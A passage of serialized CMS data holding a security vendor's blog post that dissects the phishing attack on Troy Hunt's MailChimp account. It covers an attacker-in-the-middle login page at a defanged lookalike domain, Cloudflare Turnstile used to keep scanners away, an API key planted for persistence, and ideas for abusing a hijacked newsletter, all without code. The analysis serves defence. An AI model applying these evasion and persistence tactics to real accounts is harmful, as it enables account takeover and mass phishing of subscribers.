"data":121285,"content":121288},{"target":121286},{"sys":121287},{"id":69437,"type":317,"linkType":318},[],{"nodeType":178,"data":121290,"content":121291},{},[121292],{"nodeType":173,"value":69443,"marks":121293,"data":121294},[],{},{"nodeType":312,"data":121296,"content":121299},{"target":121297},{"sys":121298},{"id":69450,"type":317,"linkType":318},[],{"nodeType":178,"data":121301,"content":121302},{},[121303],{"nodeType":173,"value":69456,"marks":121304,"data":121305},[],{},{"nodeType":178,"data":121307,"content":121308},{},[121309],{"nodeType":173,"value":69463,"marks":121310,"data":121311},[],{},{"nodeType":231,"data":121313,"content":121314},{},[],{"nodeType":235,"data":121316,"content":121317},{},[121318],{"nodeType":173,"value":69473,"marks":121319,"data":121321},[121320],{"type":370},{},{"nodeType":178,"data":121323,"content":121324},{},[121325,121328,121335],{"nodeType":173,"value":69481,"marks":121326,"data":121327},[],{},{"nodeType":186,"data":121329,"content":121330},{"uri":61655},[121331],{"nodeType":173,"value":69488,"marks":121332,"data":121334},[121333],{"type":194},{},{"nodeType":173,"value":69493,"marks":121336,"data":121337},[],{},{"nodeType":312,"data":121339,"content":121342},{"target":121340},{"sys":121341},{"id":69500,"type":317,"linkType":318},[],{"nodeType":178,"data":121344,"content":121345},{},[121346],{"nodeType":173,"value":69506,"marks":121347,"data":121348},[],{},{"nodeType":312,"data":121350,"content":121353},{"target":121351},{"sys":121352},{"id":69513,"type":317,"linkType":318},[],{"nodeType":231,"data":121355,"content":121356},{},[],{"nodeType":169,"data":121358,"content":121359},{},[121360],{"nodeType":173,"value":69522,"marks":121361,"data":121363},[121362],{"type":370},{},{"nodeType":178,"data":121365,"content":121366},{},[121367,121370,121377],{"nodeType":173,"value":69530,"marks":121368,"data":121369},[],{},{"nodeType":186,"data":121371,"content":121372},{"uri":69535},[121373],{"nodeType":173,"value":69538,"marks":121374,"data":121376},[121375],{"type":194},{},{"nodeType":173,"value":69543,"marks":121378,"data":121379},[],{},{"nodeType":312,"data":121381,"content":121384},{"target":121382},{"sys":121383},{"id":69550,"type":317,"linkType":318},[],{"nodeType":178,"data":121386,"content":121387},{},[121388],{"nodeType":173,"value":69556,"marks":121389,"data":121390},[],{},{"nodeType":312,"data":121392,"content":121395},{"target":121393},{"sys":121394},{"id":69563,"type":317,"linkType":318},[],{"nodeType":178,"data":121397,"content":121398},{},[121399,121402,121409],{"nodeType":173,"value":69569,"marks":121400,"data":121401},[],{},{"nodeType":186,"data":121403,"content":121404},{"uri":69574},[121405],{"nodeType":173,"value":69577,"marks":121406,"data":121408},[121407],{"type":194},{},{"nodeType":173,"value":69582,"marks":121410,"data":121411},[],{},{"nodeType":312,"data":121413,"content":121416},{"target":121414},{"sys":121415},{"id":69589,"type":317,"linkType":318},[],{"nodeType":312,"data":121418,"content":121421},{"target":121419},{"sys":121420},{"id":69595,"type":317,"linkType":318},[],{"nodeType":231,"data":121423,"content":121424},{},[],{"nodeType":169,"data":121426,"content":121427},{},[121428],{"nodeType":173,"value":69604,"marks":121429,"data":121431},[121430],{"type":370},{},{"nodeType":178,"data":121433,"content":121434},{},[121435],{"nodeType":173,"value":69612,"marks":121436,"data":121437},[],{},{"nodeType":178,"data":121439,"content":121440},{},[121441],{"nodeType":173,"value":69619,"marks":121442,"data":121443},[],{},{"nodeType":312,"data":121445,"content":121448},{"target":121446},{"sys":121447},{"id":69626,"type":317,"linkType":318},[],{"nodeType":231,"data":121450,"content":121451},{},[],{"nodeType":169,"data":121453,"content":121454},{},[121455],{"nodeType":173,"value":69635,"marks":121456,"data":121458},[121457],{"type":370},{},{"nodeType":178,"data":121460,"content":121461},{},[121462],{"nodeType":173,"value":69643,"marks":121463,"data":121464},[],{},{"nodeType":178,"data":121466,"content":121467},{},[121468],{"nodeType":173,"value":69650,"marks":121469,"data":121470},[],{},{"nodeType":231,"data":121472,"content":121473},{},[],{"nodeType":169,"data":121475,"content":121476},{},[121477],{"nodeType":173,"value":69660,"marks":121478,"data":121480},[121479],{"type":370},{},{"nodeType":178,"data":121482,"content":121483},{},[121484],{"nodeType":173,"value":69668,"marks":121485,"data":121486},[],{},{"nodeType":178,"data":121488,"content":121489},{},[121490],{"nodeType":173,"value":69675,"marks":121491,"data":121492},[],{},{"nodeType":312,"data":121494,"content":121497},{"target":121495},{"sys":121496},{"id":69682,"type":317,"linkType":318},[],{"nodeType":178,"data":121499,"content":121500},{},[121501],{"nodeType":173,"value":69688,"marks":121502,"data":121503},[],{},{"nodeType":250,"data":121505,"content":121506},{},[121507,121516,121525],{"nodeType":254,"data":121508,"content":121509},{},[121510],{"nodeType":178,"data":121511,"content":121512},{},[121513],{"nodeType":173,"value":69701,"marks":121514,"data":121515},[],{},{"nodeType":254,"data":121517,"content":121518},{},[121519],{"nodeType":178,"data":121520,"content":121521},{},[121522],{"nodeType":173,"value":69711,"marks":121523,"data":121524},[],{},{"nodeType":254,"data":121526,"content":121527},{},[121528],{"nodeType":178,"data":121529,"content":121530},{},[121531],{"nodeType":173,"value":69721,"marks":121532,"data":121533},[],{},{"nodeType":312,"data":121535,"content":121538},{"target":121536},{"sys":121537},{"id":69728,"type":317,"linkType":318},[],{"nodeType":235,"data":121540,"content":121541},{},[121542],{"nodeType":173,"value":461,"marks":121543,"data":121545},[121544],{"type":370},{},{"nodeType":178,"data":121547,"content":121548},{},[121549],{"nodeType":173,"value":69741,"marks":121550,"data":121551},[],{},{"nodeType":178,"data":121553,"content":121554},{},[121555,121558,121564],{"nodeType":173,"value":69748,"marks":121556,"data":121557},[],{},{"nodeType":186,"data":121559,"content":121560},{"uri":1469},[121561],{"nodeType":173,"value":476,"marks":121562,"data":121563},[],{},{"nodeType":173,"value":69758,"marks":121565,"data":121566},[],{},{"items":121568},[121569,121571],{"sys":121570,"name":505},{"id":504},{"sys":121572,"name":509},{"id":508},{"items":121574},[121575],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":121576},{"url":8615},{"__typename":1528,"sys":121578,"content":121580,"title":122341,"synopsis":122342,"hashTags":118,"publishedDate":122343,"slug":122344,"tagsCollection":122345,"authorsCollection":122351},{"id":121579},"3RhqaMQEBAQBdfHDQeoELF",{"json":121581},{"nodeType":165,"data":121582,"content":121583},{},[121584,121591,121624,121631,121650,121657,121660,121667,121674,121680,121687,121693,121699,121706,121723,121729,121736,121739,121747,121766,121789,121796,121804,121811,121818,121824,121832,121851,121870,121876,121883,121889,121897,121929,121935,121942,121945,121953,121960,121980,121987,121993,122001,122008,122015,122022,122029,122097,122104,122112,122131,122137,122144,122151,122157,122164,122170,122178,122185,122191,122197,122204,122207,122214,122244,122251,122270,122277,122288,122295,122298,122305,122324],{"nodeType":178,"data":121585,"content":121586},{},[121587],{"nodeType":173,"value":121588,"marks":121589,"data":121590},"Phishing attacks using Attacker-in-the-Middle (AitM) kits are increasingly the default for both credential harvesting campaigns and targeted phishing attacks. It’s easy to see why, too:",[],{},{"nodeType":250,"data":121592,"content":121593},{},[121594,121604,121614],{"nodeType":254,"data":121595,"content":121596},{},[121597],{"nodeType":178,"data":121598,"content":121599},{},[121600],{"nodeType":173,"value":121601,"marks":121602,"data":121603},"They’re very difficult to spot as a user and often function like the real page should, logging the victim into the genuine site once the phish is complete",[],{},{"nodeType":254,"data":121605,"content":121606},{},[121607],{"nodeType":178,"data":121608,"content":121609},{},[121610],{"nodeType":173,"value":121611,"marks":121612,"data":121613},"They’re incredibly scalable, and attackers have an increasing number of options to choose from when it comes to off-the-shelf tools and commercial Phishing-as-a-Service offerings ",[],{},{"nodeType":254,"data":121615,"content":121616},{},[121617],{"nodeType":178,"data":121618,"content":121619},{},[121620],{"nodeType":173,"value":121621,"marks":121622,"data":121623},"And most importantly, they reliably bypass 99% of the MFA methods encountered in the wild, defeating OTP, SMS and push-based authentication",[],{},{"nodeType":178,"data":121625,"content":121626},{},[121627],{"nodeType":173,"value":121628,"marks":121629,"data":121630},"There are basically no downsides to AitM for an attacker. But all the same, they don’t get all that much publicity — probably because traditional phishing prevention solutions are failing to detect them (before the attack succeeds, anyway — and nobody really wants to own up to that). ",[],{},{"nodeType":178,"data":121632,"content":121633},{},[121634,121638,121647],{"nodeType":173,"value":121635,"marks":121636,"data":121637},"So, it’s refreshing to see Troy Hunt, creator of the widely used Have I Been Pwned (HIBP) service, ",[],{},{"nodeType":186,"data":121639,"content":121641},{"uri":121640},"https://www.troyhunt.com/a-sneaky-phish-just-grabbed-my-mailchimp-mailing-list/",[121642],{"nodeType":173,"value":121643,"marks":121644,"data":121646},"publicly discussing a recent attack he fell victim to",[121645],{"type":194},{},{"nodeType":173,"value":197,"marks":121648,"data":121649},[],{},{"nodeType":178,"data":121651,"content":121652},{},[121653],{"nodeType":173,"value":121654,"marks":121655,"data":121656},"Before we consider the significance of Troy failing to spot the phish — the creator of one of the most widely used services for stolen passwords, working with government on phishing prevention guidance — let's start by breaking down the attack itself. ",[],{},{"nodeType":231,"data":121658,"content":121659},{},[],{"nodeType":169,"data":121661,"content":121662},{},[121663],{"nodeType":173,"value":24096,"marks":121664,"data":121666},[121665],{"type":370},{},{"nodeType":178,"data":121668,"content":121669},{},[121670],{"nodeType":173,"value":121671,"marks":121672,"data":121673},"Troy received a phishing email appearing to be from MailChimp prompting him to sign into his account, with the lure informing him it had had been restricted due to a spam complaint",[],{},{"nodeType":312,"data":121675,"content":121679},{"target":121676},{"sys":121677},{"id":121678,"type":317,"linkType":318},"5A4CPvTyKhClC8LgHY5916",[],{"nodeType":178,"data":121681,"content":121682},{},[121683],{"nodeType":173,"value":121684,"marks":121685,"data":121686},"The email matched Mailchimp’s brand, but the sender address was obviously suspicious. Unfortunately, Troy initially accessed the email via mobile, which hid the sender address — which he then missed when accessing from his PC. ",[],{},{"nodeType":312,"data":121688,"content":121692},{"target":121689},{"sys":121690},{"id":121691,"type":317,"linkType":318},"1JWw4jO3qxxJeHO3qtMuZc",[],{"nodeType":312,"data":121694,"content":121698},{"target":121695},{"sys":121696},{"id":121697,"type":317,"linkType":318},"1ebM2R90arTKlCmxmtvYjz",[],{"nodeType":178,"data":121700,"content":121701},{},[121702],{"nodeType":173,"value":121703,"marks":121704,"data":121705},"Troy was directed to the page hxxps://mailchimp-sso.com. Troy entered his credentials and MFA token and logged in. The page hung and he realized he had been phished…",[],{},{"nodeType":178,"data":121707,"content":121708},{},[121709,121713,121720],{"nodeType":173,"value":121710,"marks":121711,"data":121712},"The attack then automatically executed, with the attacker exporting 16,000 contact records from MailChimp and creating an API key to provide backdoor access to the app (a form of ",[],{},{"nodeType":186,"data":121714,"content":121715},{"uri":832},[121716],{"nodeType":173,"value":4519,"marks":121717,"data":121719},[121718],{"type":194},{},{"nodeType":173,"value":53584,"marks":121721,"data":121722},[],{},{"nodeType":312,"data":121724,"content":121728},{"target":121725},{"sys":121726},{"id":121727,"type":317,"linkType":318},"2MDWfQFU69GaiMCxdvvq8U",[],{"nodeType":178,"data":121730,"content":121731},{},[121732],{"nodeType":173,"value":121733,"marks":121734,"data":121735},"Let’s have a look at what makes this attack interesting. ",[],{},{"nodeType":231,"data":121737,"content":121738},{},[],{"nodeType":169,"data":121740,"content":121741},{},[121742],{"nodeType":173,"value":121743,"marks":121744,"data":121746},"Breaking the attack down",[121745],{"type":370},{},{"nodeType":178,"data":121748,"content":121749},{},[121750,121754,121762],{"nodeType":173,"value":121751,"marks":121752,"data":121753},"As far as ",[],{},{"nodeType":186,"data":121755,"content":121756},{"uri":97747},[121757],{"nodeType":173,"value":121758,"marks":121759,"data":121761},"some of the AitM attacks we’ve observed in the wild",[121760],{"type":194},{},{"nodeType":173,"value":121763,"marks":121764,"data":121765}," go, this wasn’t the most advanced example we’ve seen: ",[],{},{"nodeType":250,"data":121767,"content":121768},{},[121769,121779],{"nodeType":254,"data":121770,"content":121771},{},[121772],{"nodeType":178,"data":121773,"content":121774},{},[121775],{"nodeType":173,"value":121776,"marks":121777,"data":121778},"It didn’t try to obfuscate the notably suspicious sender address or use a legit SaaS service to give the email sender a reputable domain.",[],{},{"nodeType":254,"data":121780,"content":121781},{},[121782],{"nodeType":178,"data":121783,"content":121784},{},[121785],{"nodeType":173,"value":121786,"marks":121787,"data":121788},"It didn’t see the victim access the real login page, and instead terminated the connection at the point the credentials were captured — meaning Troy was immediately suspicious (I guess it doesn’t really matter given the attack executed instantly, automatically).",[],{},{"nodeType":178,"data":121790,"content":121791},{},[121792],{"nodeType":173,"value":121793,"marks":121794,"data":121795},"That said, it did use a few interesting tricks and techniques. ",[],{},{"nodeType":235,"data":121797,"content":121798},{},[121799],{"nodeType":173,"value":121800,"marks":121801,"data":121803},"Enumerating suitable victims",[121802],{"type":370},{},{"nodeType":178,"data":121805,"content":121806},{},[121807],{"nodeType":173,"value":121808,"marks":121809,"data":121810},"It’s notable that Troy claims the email he used to access MailChimp wasn’t used anywhere else — meaning the attacker probably guessed it. The domain is partially obscured here but it's likely that this is Troy’s own personal domain. It isn’t too much of a stretch to imagine that organizations frequently set up dedicated email addresses for their MailChimp accounts or newsletters generally (e.g. mailchimp@exampledomain.com). ",[],{},{"nodeType":178,"data":121812,"content":121813},{},[121814],{"nodeType":173,"value":121815,"marks":121816,"data":121817},"Undeniably, Troy’s MailChimp account is probably more of a target than most given the success of his newsletter, but it’s still likely that the attacker spammed many possible address and domain combinations to see what stuck. There’s a degree of luck, but also some smart guesswork at play here. ",[],{},{"nodeType":312,"data":121819,"content":121823},{"target":121820},{"sys":121821},{"id":121822,"type":317,"linkType":318},"5TgXthj5tsvWX87QHZH1WQ",[],{"nodeType":235,"data":121825,"content":121826},{},[121827],{"nodeType":173,"value":121828,"marks":121829,"data":121831},"Using legit services like Cloudflare to defeat detections ",[121830],{"type":370},{},{"nodeType":178,"data":121833,"content":121834},{},[121835,121839,121847],{"nodeType":173,"value":121836,"marks":121837,"data":121838},"The attacker used Cloudflare to host the domain, which is ",[],{},{"nodeType":186,"data":121840,"content":121841},{"uri":74693},[121842],{"nodeType":173,"value":121843,"marks":121844,"data":121846},"consistent with what we’ve observed attackers doing in the wild",[121845],{"type":194},{},{"nodeType":173,"value":121848,"marks":121849,"data":121850},". Even if this means that Cloudflare will probably take the domain down eventually, they aren’t great at identifying the page right away. Given the rate at which attacker infrastructure is burned and rotated, the pros outweigh the cons for the attacker by giving the site legitimate hosting infrastructure, which can defeat some of the common checks performed by anti-phishing tools.",[],{},{"nodeType":178,"data":121852,"content":121853},{},[121854,121858,121866],{"nodeType":173,"value":121855,"marks":121856,"data":121857},"Troy also mentions seeing a 'Cloudflare anti-automation widget' when accessing the page, which is most likely Cloudflare Turnstile — a creative alternative to CAPTCHA to prevent security bots from accessing and loading malicious pages to analyse them. We've seen attackers use Turnstile ",[],{},{"nodeType":186,"data":121859,"content":121860},{"uri":74693},[121861],{"nodeType":173,"value":121862,"marks":121863,"data":121865},"along with a host of other obfuscation techniques",[121864],{"type":194},{},{"nodeType":173,"value":121867,"marks":121868,"data":121869}," to defeat common detections by preventing security tools from analysing the malicious page. ",[],{},{"nodeType":312,"data":121871,"content":121875},{"target":121872},{"sys":121873},{"id":121874,"type":317,"linkType":318},"2X1r1qbE5CVcJ0xVcESGK7",[],{"nodeType":178,"data":121877,"content":121878},{},[121879],{"nodeType":173,"value":121880,"marks":121881,"data":121882},"Although this page has now been taken down, the campaign undoubtedly continues — another will have been rotated in to take its place. ",[],{},{"nodeType":312,"data":121884,"content":121888},{"target":121885},{"sys":121886},{"id":121887,"type":317,"linkType":318},"26wnNFTED2f6O1HtqL3Cgu",[],{"nodeType":235,"data":121890,"content":121891},{},[121892],{"nodeType":173,"value":121893,"marks":121894,"data":121896},"Configuring ghost logins via API keys to backdoor the account ",[121895],{"type":370},{},{"nodeType":178,"data":121898,"content":121899},{},[121900,121904,121913,121917,121925],{"nodeType":173,"value":121901,"marks":121902,"data":121903},"The attacker also configured an API key — a smart way to backdoor an app and something we’ve previously ",[],{},{"nodeType":186,"data":121905,"content":121907},{"uri":121906},"https://pushsecurity.com/resources/phishing-detecting-evilginx-evilnovnc-muraena-and-modlishka",[121908],{"nodeType":173,"value":121909,"marks":121910,"data":121912},"demonstrated in our webinars",[121911],{"type":194},{},{"nodeType":173,"value":121914,"marks":121915,"data":121916}," as a ",[],{},{"nodeType":186,"data":121918,"content":121919},{"uri":88239},[121920],{"nodeType":173,"value":121921,"marks":121922,"data":121924},"SaaS-native attack technique",[121923],{"type":194},{},{"nodeType":173,"value":121926,"marks":121927,"data":121928}," for persistence. It means that even if the credentials are changed, the attacker can maintain access to the account.",[],{},{"nodeType":312,"data":121930,"content":121934},{"target":121931},{"sys":121932},{"id":121933,"type":317,"linkType":318},"35GkKL1rXnWHNZa1EBHLyD",[],{"nodeType":178,"data":121936,"content":121937},{},[121938],{"nodeType":173,"value":121939,"marks":121940,"data":121941},"Now, as a security pro, Troy noticed this and deleted it — but many less technical victims wouldn’t know to do this. It’s also not unusual for automated emails from applications to go to spam — meaning some victims potentially wouldn’t spot the notification sent to them. ",[],{},{"nodeType":231,"data":121943,"content":121944},{},[],{"nodeType":169,"data":121946,"content":121947},{},[121948],{"nodeType":173,"value":121949,"marks":121950,"data":121952},"But — why MailChimp? ",[121951],{"type":370},{},{"nodeType":178,"data":121954,"content":121955},{},[121956],{"nodeType":173,"value":121957,"marks":121958,"data":121959},"This was the big question we asked ourselves when looking into this attack. Most phishing attacks targeting businesses tend to focus on core platforms like Microsoft, Google Workspace, etc. — usually Identity Providers (IdPs) that provide both access to email and downstream apps via SSO. It’s the biggest bang for their buck and most tooling is preconfigured to support these platforms. So MailChimp seems an unusual choice at first glance. ",[],{},{"nodeType":178,"data":121961,"content":121962},{},[121963,121967,121976],{"nodeType":173,"value":121964,"marks":121965,"data":121966},"But, we’ve seen recently that it's getting easier for attackers to ",[],{},{"nodeType":186,"data":121968,"content":121970},{"uri":121969},"https://www.bleepingcomputer.com/news/security/darcula-phaas-can-now-auto-generate-phishing-kits-for-any-brand/",[121971],{"nodeType":173,"value":121972,"marks":121973,"data":121975},"impersonate a broader range of brands",[121974],{"type":194},{},{"nodeType":173,"value":121977,"marks":121978,"data":121979},". And there’s something to be said for targeting an app like MailChimp — your guard is naturally probably lower than it would be for a Microsoft-based phish, increasing the chance of success. ",[],{},{"nodeType":178,"data":121981,"content":121982},{},[121983],{"nodeType":173,"value":121984,"marks":121985,"data":121986},"But what’s the payout? The data collected doesn’t seem to be overly valuable — 16k records including email address, IP, and rough geolocation data. Not particularly exploitable by itself…",[],{},{"nodeType":312,"data":121988,"content":121992},{"target":121989},{"sys":121990},{"id":121991,"type":317,"linkType":318},"OjZtHXit6WO6Zd9tCUYpJ",[],{"nodeType":235,"data":121994,"content":121995},{},[121996],{"nodeType":173,"value":121997,"marks":121998,"data":122000},"Part of a multi stage attack? ",[121999],{"type":370},{},{"nodeType":178,"data":122002,"content":122003},{},[122004],{"nodeType":173,"value":122005,"marks":122006,"data":122007},"This gets a lot more interesting when you consider the different things an attacker might do as part of a broader campaign. ",[],{},{"nodeType":178,"data":122009,"content":122010},{},[122011],{"nodeType":173,"value":122012,"marks":122013,"data":122014},"With access to MailChimp, an attacker can send emails on behalf of the compromised account. These emails are highly trusted and expected from the sender, meaning people receiving them are much more likely to engage with the content, click the links, etc. ",[],{},{"nodeType":178,"data":122016,"content":122017},{},[122018],{"nodeType":173,"value":122019,"marks":122020,"data":122021},"So what if an attacker compromised an account, inserted a load of malicious links into the newsletter, and used it in itself as a mass-phishing vector, designed to capture user credentials or deliver malware? Pretty devious! If you scale this up across multiple victims (and not all of them realize that they’ve been phished) you’ve suddenly got your hands on an incredibly valuable phishing vector that is much more likely to succeed than your average cold approach. ",[],{},{"nodeType":178,"data":122023,"content":122024},{},[122025],{"nodeType":173,"value":122026,"marks":122027,"data":122028},"Then, with the additional victims, you could target accounts that are much more inherently valuable to an attacker. You could:",[],{},{"nodeType":250,"data":122030,"content":122031},{},[122032,122064,122087],{"nodeType":254,"data":122033,"content":122034},{},[122035],{"nodeType":178,"data":122036,"content":122037},{},[122038,122042,122049,122053,122060],{"nodeType":173,"value":122039,"marks":122040,"data":122041},"Deploy infostealer malware, which has dominated the headlines since the success of the ",[],{},{"nodeType":186,"data":122043,"content":122044},{"uri":819},[122045],{"nodeType":173,"value":27706,"marks":122046,"data":122048},[122047],{"type":194},{},{"nodeType":173,"value":122050,"marks":122051,"data":122052}," attacks last year, and are continually resulting in data breaches via attackers logging into apps using stolen credentials such as the recent attacks on ",[],{},{"nodeType":186,"data":122054,"content":122055},{"uri":27726},[122056],{"nodeType":173,"value":27729,"marks":122057,"data":122059},[122058],{"type":194},{},{"nodeType":173,"value":122061,"marks":122062,"data":122063}," platforms.",[],{},{"nodeType":254,"data":122065,"content":122066},{},[122067],{"nodeType":178,"data":122068,"content":122069},{},[122070,122074,122083],{"nodeType":173,"value":122071,"marks":122072,"data":122073},"Target personal apps for banking, email, e-com, and other easily monetizable services — which is increasingly easy to do at-scale using ",[],{},{"nodeType":186,"data":122075,"content":122077},{"uri":122076},"https://www.bleepingcomputer.com/news/security/new-atlantis-aio-automates-credential-stuffing-on-140-services/",[122078],{"nodeType":173,"value":122079,"marks":122080,"data":122082},"tooling for hire",[122081],{"type":194},{},{"nodeType":173,"value":122084,"marks":122085,"data":122086}," with stolen credentials.",[],{},{"nodeType":254,"data":122088,"content":122089},{},[122090],{"nodeType":178,"data":122091,"content":122092},{},[122093],{"nodeType":173,"value":122094,"marks":122095,"data":122096},"Even attempt to deploy ransomware and other malicious software to progress an attack on user devices and networks (a pretty relevant use case for the many subscribers of Troy’s newsletter accessing it on their corporate device!).",[],{},{"nodeType":178,"data":122098,"content":122099},{},[122100],{"nodeType":173,"value":122101,"marks":122102,"data":122103},"Even grabbing the list of newsletter sign-ups could enable the attacker to perform this attack from a different MailChimp account, so anyone subscribed to Troy’s newsletter should be wary of emails impersonating Troy’s newsletter reaching them from a different sender address than usual. ",[],{},{"nodeType":235,"data":122105,"content":122106},{},[122107],{"nodeType":173,"value":122108,"marks":122109,"data":122111},"Account security limitations",[122110],{"type":370},{},{"nodeType":178,"data":122113,"content":122114},{},[122115,122119,122127],{"nodeType":173,"value":122116,"marks":122117,"data":122118},"On the theme of MailChimp, it’s also notable that MailChimp doesn’t appear to offer SAML support. ",[],{},{"nodeType":186,"data":122120,"content":122122},{"uri":122121},"https://www.okta.com/integrations/mailchimp/",[122123],{"nodeType":173,"value":122124,"marks":122125,"data":122126},"Okta lists the app as only available for SWA",[],{},{"nodeType":173,"value":122128,"marks":122129,"data":122130}," (where separate credentials are created to access the app, managed through Okta — more like a password manager than genuine SSO via SAML or OIDC).",[],{},{"nodeType":312,"data":122132,"content":122136},{"target":122133},{"sys":122134},{"id":122135,"type":317,"linkType":318},"7b4RZhUIqJMF1OxmyR0qKH",[],{"nodeType":178,"data":122138,"content":122139},{},[122140],{"nodeType":173,"value":122141,"marks":122142,"data":122143},"This means you’re forced to use a username and password. Your only SSO option is to sign in with Google — which many non-Google Workspace users may not have access to. ",[],{},{"nodeType":178,"data":122145,"content":122146},{},[122147],{"nodeType":173,"value":122148,"marks":122149,"data":122150},"As Troy points out, MailChimp also fails to offer support for phishing-resistant MFA. This is pretty typical (if disappointing) for the long tail of SaaS apps, which typically leave WebAuthn / passkey support to the IdP. Except in this case, support for SSO in general is limited, meaning you can only use passkeys if you’re logging in with Google. ",[],{},{"nodeType":312,"data":122152,"content":122156},{"target":122153},{"sys":122154},{"id":122155,"type":317,"linkType":318},"2lT7fBiOq4JxpMxSLrdUOv",[],{"nodeType":178,"data":122158,"content":122159},{},[122160],{"nodeType":173,"value":122161,"marks":122162,"data":122163},"So it’s possible that attackers have noticed that accounts in MailChimp are far more likely to have insecure accounts than other traditional phishing targets — simply because they cannot be configured as securely. ",[],{},{"nodeType":312,"data":122165,"content":122169},{"target":122166},{"sys":122167},{"id":122168,"type":317,"linkType":318},"30APqb65kzTA4ySWJIkxGh",[],{"nodeType":235,"data":122171,"content":122172},{},[122173],{"nodeType":173,"value":122174,"marks":122175,"data":122177},"It might not just be MailChimp",[122176],{"type":370},{},{"nodeType":178,"data":122179,"content":122180},{},[122181],{"nodeType":173,"value":122182,"marks":122183,"data":122184},"It looks like the same attackers have previously targeted ActiveCampaign, a marketing email and automation platform, based on GitHub comments from December. A domain previously flagged as malicious relating to ActiveCampaign currently redirects to the malicious MailChimp domain seen in Troy’s attack.",[],{},{"nodeType":312,"data":122186,"content":122190},{"target":122187},{"sys":122188},{"id":122189,"type":317,"linkType":318},"7M8W9vAYdqPN8NMU8Ug7jq",[],{"nodeType":312,"data":122192,"content":122196},{"target":122193},{"sys":122194},{"id":122195,"type":317,"linkType":318},"7CJfZwc9BpzIL7Fma1Y6o1",[],{"nodeType":178,"data":122198,"content":122199},{},[122200],{"nodeType":173,"value":122201,"marks":122202,"data":122203},"This could point to a broader campaign targeting similar SaaS platforms for marketing automation and email distribution.",[],{},{"nodeType":231,"data":122205,"content":122206},{},[],{"nodeType":169,"data":122208,"content":122209},{},[122210],{"nodeType":173,"value":16139,"marks":122211,"data":122213},[122212],{"type":370},{},{"nodeType":178,"data":122215,"content":122216},{},[122217,122221,122228,122231,122240],{"nodeType":173,"value":122218,"marks":122219,"data":122220},"MailChimp might seem an unusual target but there are a lot of ways that attackers can abuse SaaS services, as we’ve discussed at length in our public research with the ",[],{},{"nodeType":186,"data":122222,"content":122223},{"uri":88239},[122224],{"nodeType":173,"value":88245,"marks":122225,"data":122227},[122226],{"type":194},{},{"nodeType":173,"value":933,"marks":122229,"data":122230},[],{},{"nodeType":186,"data":122232,"content":122234},{"uri":122233},"https://pushsecurity.com/resources/",[122235],{"nodeType":173,"value":122236,"marks":122237,"data":122239},"many webinars and conference talks",[122238],{"type":194},{},{"nodeType":173,"value":122241,"marks":122242,"data":122243},". Account takeover through modern phishing attacks like the one we've analysed here is key to unlocking this attack surface. ",[],{},{"nodeType":178,"data":122245,"content":122246},{},[122247],{"nodeType":173,"value":122248,"marks":122249,"data":122250},"While the vast majority of phishing attacks that we observe do focus on core platforms like Microsoft, Google Workspace and Okta, it makes sense that attackers are broadening their focus to take advantage of the fact that phishing targeting these accounts is less obviously a target, and these accounts are often much less securely configured. But there are many ways to target the interconnected ecosystem of SaaS apps in creative ways that most organizations (and users) are seriously underprepared for. ",[],{},{"nodeType":178,"data":122252,"content":122253},{},[122254,122258,122266],{"nodeType":173,"value":122255,"marks":122256,"data":122257},"Attackers have been targeting consumers and individuals via their sprawl of internet apps for some time — are more business-focused threat groups waking up to the opportunity of targeting SaaS? After all, it’s a ",[],{},{"nodeType":186,"data":122259,"content":122260},{"uri":81621},[122261],{"nodeType":173,"value":122262,"marks":122263,"data":122265},"great way to evade established controls elsewhere on the network and endpoints",[122264],{"type":194},{},{"nodeType":173,"value":122267,"marks":122268,"data":122269},", and you can achieve your objectives simply by logging in to (often weakly secured) user accounts.  ",[],{},{"nodeType":178,"data":122271,"content":122272},{},[122273],{"nodeType":173,"value":122274,"marks":122275,"data":122276},"The moral of the story? Phishing attacks are getting pretty sophisticated (and often much more sophisticated than this). Even security pros get phished sometimes!",[],{},{"nodeType":3769,"data":122278,"content":122279},{},[122280],{"nodeType":178,"data":122281,"content":122282},{},[122283],{"nodeType":173,"value":122284,"marks":122285,"data":122287},"This is clear indicator that we need stronger technical controls to prevent phishing. If even someone like Troy can be phished, the only reasonable conclusion is that humans will always be susceptible to phishing, no matter how much awareness training they receive. ",[122286],{"type":370},{},{"nodeType":178,"data":122289,"content":122290},{},[122291],{"nodeType":173,"value":122292,"marks":122293,"data":122294},"A big thanks to Troy for sharing his write-up of the incident!",[],{},{"nodeType":231,"data":122296,"content":122297},{},[],{"nodeType":169,"data":122299,"content":122300},{},[122301],{"nodeType":173,"value":1422,"marks":122302,"data":122304},[122303],{"type":370},{},{"nodeType":178,"data":122306,"content":122307},{},[122308,122312,122321],{"nodeType":173,"value":122309,"marks":122310,"data":122311},"Push takes a unique browser-based approach to detecting and intercepting phishing attacks that overcomes many of the tricks and techniques attackers use to defeat conventional anti-phishing controls. To learn more, ",[],{},{"nodeType":186,"data":122313,"content":122315},{"uri":122314},"https://pushsecurity.com/blog/why-its-time-for-phishing-prevention-to-move-beyond-email/",[122316],{"nodeType":173,"value":122317,"marks":122318,"data":122320},"check out our recent blog post",[122319],{"type":194},{},{"nodeType":173,"value":197,"marks":122322,"data":122323},[],{},{"nodeType":178,"data":122325,"content":122326},{},[122327,122331,122338],{"nodeType":173,"value":122328,"marks":122329,"data":122330},"And if you want to see how Push helps you to detect and defeat common identity attack techniques like AiTM phishing, credential stuffing, and session hijacking while improving your workforce identity posture, book some time with one of our team for a ",[],{},{"nodeType":186,"data":122332,"content":122333},{"uri":473},[122334],{"nodeType":173,"value":2889,"marks":122335,"data":122337},[122336],{"type":194},{},{"nodeType":173,"value":1477,"marks":122339,"data":122340},[],{},"Dissecting a recent MailChimp phishing attack","HIBP creator and well-known security person Troy Hunt recently blogged about a phish he fell for. Here’s what it tells us about how phishing is evolving. 